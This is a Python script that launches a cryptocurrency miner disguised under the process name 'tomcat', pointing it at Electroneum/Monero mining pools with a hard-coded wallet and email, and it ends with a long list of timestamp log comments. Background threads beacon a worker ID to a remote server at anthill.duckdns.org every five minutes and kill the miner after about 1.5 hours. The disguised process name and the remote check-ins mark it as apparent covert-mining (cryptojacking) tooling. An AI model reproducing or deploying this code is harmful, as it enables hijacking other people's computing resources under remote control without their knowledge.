import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:51:01.755362
#2018-02-17 16:31:06.487277
#2018-02-17 18:18:06.819514
#2018-02-17 20:06:04.588578
#2018-02-17 21:53:05.586852
#2018-02-17 23:38:01.843820
#2018-02-18 01:27:05.068691
#2018-02-18 03:14:06.527447
#2018-02-18 05:03:05.947450
#2018-02-18 06:54:05.144560
#2018-02-18 08:42:03.814772
#2018-02-18 10:28:05.067879
#2018-02-18 12:14:03.898526
#2018-02-18 14:01:03.689568
#2018-02-18 15:51:04.387733
#2018-02-18 17:41:01.489198
#2018-02-18 19:29:03.511318
#2018-02-18 21:14:03.653612
#2018-02-18 23:02:04.140251
#2018-02-19 00:49:04.159833
#2018-02-19 02:36:05.400326
#2018-02-19 04:22:06.496723
#2018-02-19 06:07:04.464655
#2018-02-19 07:55:06.097282
#2018-02-19 09:46:08.345261
#2018-02-19 11:34:06.232402
#2018-02-19 13:21:06.520477
#2018-02-19 15:09:01.863200
#2018-02-19 16:56:07.433949
#2018-02-19 18:43:03.864544
#2018-02-19 20:29:08.421845
#2018-02-19 22:17:06.706990
#2018-02-20 00:02:06.375383
#2018-02-20 01:49:07.432269
#2018-02-20 03:39:01.796170
#2018-02-20 05:25:01.378487
#2018-02-20 07:09:07.181747
#2018-02-20 08:55:06.680351
#2018-02-20 10:39:01.260691
#2018-02-20 12:26:08.709947
#2018-02-20 14:13:01.895727
#2018-02-20 15:55:12.311091
#2018-02-20 17:42:08.562033
#2018-02-20 19:32:06.138519
#2018-02-20 21:19:06.435670
#2018-02-20 23:05:02.532956
#2018-02-21 00:49:07.859092
#2018-02-21 02:35:10.005694
#2018-02-21 04:25:05.798673
#2018-02-21 06:14:01.412378
#2018-02-21 08:00:09.978934
#2018-02-21 09:47:03.674750
#2018-02-21 11:36:07.097604
#2018-02-21 13:26:08.449752
#2018-02-21 15:11:08.055014
#2018-02-21 17:03:09.767211
#2018-02-21 18:53:01.753228
#2018-02-21 20:43:08.444114
#2018-02-21 22:27:08.674068
#2018-02-22 00:18:04.449866
#2018-02-22 02:07:01.934947
#2018-02-22 03:52:03.964499
#2018-02-22 05:38:04.448778
#2018-02-22 07:22:03.754580
#2018-02-22 09:11:08.312571
#2018-02-22 10:58:09.086099
#2018-02-22 12:45:08.360374
#2018-02-22 14:31:01.868240
#2018-02-22 16:17:01.384400
#2018-02-22 18:05:04.822754
#2018-02-22 19:56:07.787325
#2018-02-22 21:46:05.384366
#2018-02-22 23:34:02.180864
#2018-02-23 01:23:03.988695
#2018-02-23 03:08:07.555928
#2018-02-23 04:54:03.715268
#2018-02-23 06:38:04.957239
#2018-02-23 08:29:02.032900
#2018-02-23 10:44:09.724089
#2018-02-23 12:41:07.252748
#2018-02-23 14:25:07.536746
#2018-02-23 16:17:06.940488
#2018-02-23 18:03:01.572864
#2018-02-23 19:48:06.231826
#2018-02-23 21:32:07.804709
#2018-02-23 23:20:03.635796
#2018-02-24 01:13:06.031514
#2018-02-24 03:05:06.705402
#2018-02-24 04:51:06.459668
#2018-02-24 06:36:06.679446
#2018-02-24 08:25:08.102486
#2018-02-24 08:26:01.575783
#2018-02-24 10:13:01.620162
#2018-02-24 12:08:03.691487
#2018-02-24 13:55:04.612217
#2018-02-24 15:48:05.386034
#2018-02-24 17:43:01.886063
#2018-02-24 19:27:05.825437
#2018-02-24 21:17:06.929861
#2018-02-24 23:55:01.490649
#2018-02-25 04:06:05.127832
#2018-02-25 07:37:01.734481